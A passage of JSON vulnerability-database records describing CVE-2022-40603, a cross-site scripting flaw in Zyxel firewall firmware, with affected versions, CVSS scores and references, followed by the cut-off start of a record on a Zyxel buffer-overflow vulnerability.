                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.31",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.31",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.31",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.31",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.31",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.31",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.31",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.31",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.31",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.31",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_50w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.31",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn1000:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.31",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.31",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.31",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg40_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.72",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg40:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg40w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.72",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg40w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg60_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.72",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg60:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg60w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.72",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg60w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-40603"
          }
        ]
      },
      "cve": "CVE-2022-40603",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.8,
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "security@zyxel.com.tw",
                "availabilityImpact": "NONE",
                "baseScore": 4.7,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.8,
                "impactScore": 1.4,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 6.1,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2022-40603",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2022-40603",
                "trust": 1.8,
                "value": "MEDIUM"
              },
              {
                "author": "security@zyxel.com.tw",
                "id": "CVE-2022-40603",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202212-2533",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-022564"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-40603"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-40603"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2533"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A cross-site scripting (XSS) vulnerability in the CGI program of Zyxel ZyWALL/USG series firmware versions 4.30 through 4.72, VPN series firmware versions 4.30 through 5.31, USG FLEX series firmware versions 4.50 through 5.31, and ATP series firmware versions 4.32 through 5.31, which could allow an attacker to trick a user into visiting a crafted URL with the XSS payload. Then, the attacker could gain access to some browser-based information if the malicious script is executed on the victim\u2019s browser. ATP800 firmware, ATP700 firmware, ATP500 firmware etc. ZyXEL A cross-site scripting vulnerability exists in the product.Information may be obtained and information may be tampered with",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-40603"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-022564"
          }
        ],
        "trust": 1.62
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-40603",
            "trust": 3.2
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-022564",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2533",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-022564"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-40603"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2533"
          }
        ]
      },
      "id": "VAR-202212-1097",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.287857154
      },
      "last_update_date": "2023-12-18T11:55:17.875000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Zyxel USG/ZyWALL Fixes for cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=216748"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2533"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.0
          },
          {
            "problemtype": "Cross-site scripting (CWE-79) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-022564"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-40603"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-xss-vulnerability-in-firewalls"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-40603"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2022-40603/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-022564"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-40603"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2533"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-022564"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-40603"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2533"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-11-17T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-022564"
          },
          {
            "date": "2022-12-06T02:15:09.730000",
            "db": "NVD",
            "id": "CVE-2022-40603"
          },
          {
            "date": "2022-12-06T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202212-2533"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-11-17T08:21:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-022564"
          },
          {
            "date": "2022-12-08T16:41:37.513000",
            "db": "NVD",
            "id": "CVE-2022-40603"
          },
          {
            "date": "2022-12-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202212-2533"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2533"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0ZyXEL\u00a0 Cross-site scripting vulnerability in the product",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-022564"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202212-2533"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202305-2285

    Vulnerability from variot - Updated: 2023-12-18 11:54

    A buffer overflow vulnerability in the ID processing function in Zyxel ATP series firmware versions 4.32 through 5.36 Patch 1, USG FLEX series firmware versions 4.50 through 5.36 Patch 1, USG FLEX 50(W) firmware versions 4.25 through 5.36 Patch 1, USG20(W)-VPN firmware versions 4.25 through 5.36 Patch 1, VPN series firmware versions 4.30 through 5.36 Patch 1, ZyWALL/USG series firmware versions 4.25 through 4.73 Patch 1, could allow an unauthenticated attacker to cause denial-of-service (DoS) conditions and even a remote code execution on an affected device. ATP100 firmware, ATP200 firmware, ATP500 firmware etc. ZyXEL The product contains a classic buffer overflow vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202305-2285",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "usg flex 700",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp500",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg 40w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.25"
          },
          {
            "model": "usg 40",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.25"
          },
          {
            "model": "usg 60w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.25"
          },
          {
            "model": "atp700",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 200",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 500",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg20-vpn",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp800",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "atp100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 100w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg 40w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.73"
          },
          {
            "model": "atp800",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg 40",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.73"
          },
          {
            "model": "usg 60w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.73"
          },
          {
            "model": "vpn300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "atp700",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg20-vpn",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "vpn1000",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "vpn300",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp500",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg flex 50w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp100w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "vpn100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg 40",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.73"
          },
          {
            "model": "usg flex 500",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "vpn100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "atp100",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg 60",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.73"
          },
          {
            "model": "vpn50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "atp100w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp200",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "vpn1000",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "vpn1000",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 50w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.25"
          },
          {
            "model": "atp100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg 60",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.25"
          },
          {
            "model": "usg flex 100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "vpn300",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp100w",
            "scope": "gte",
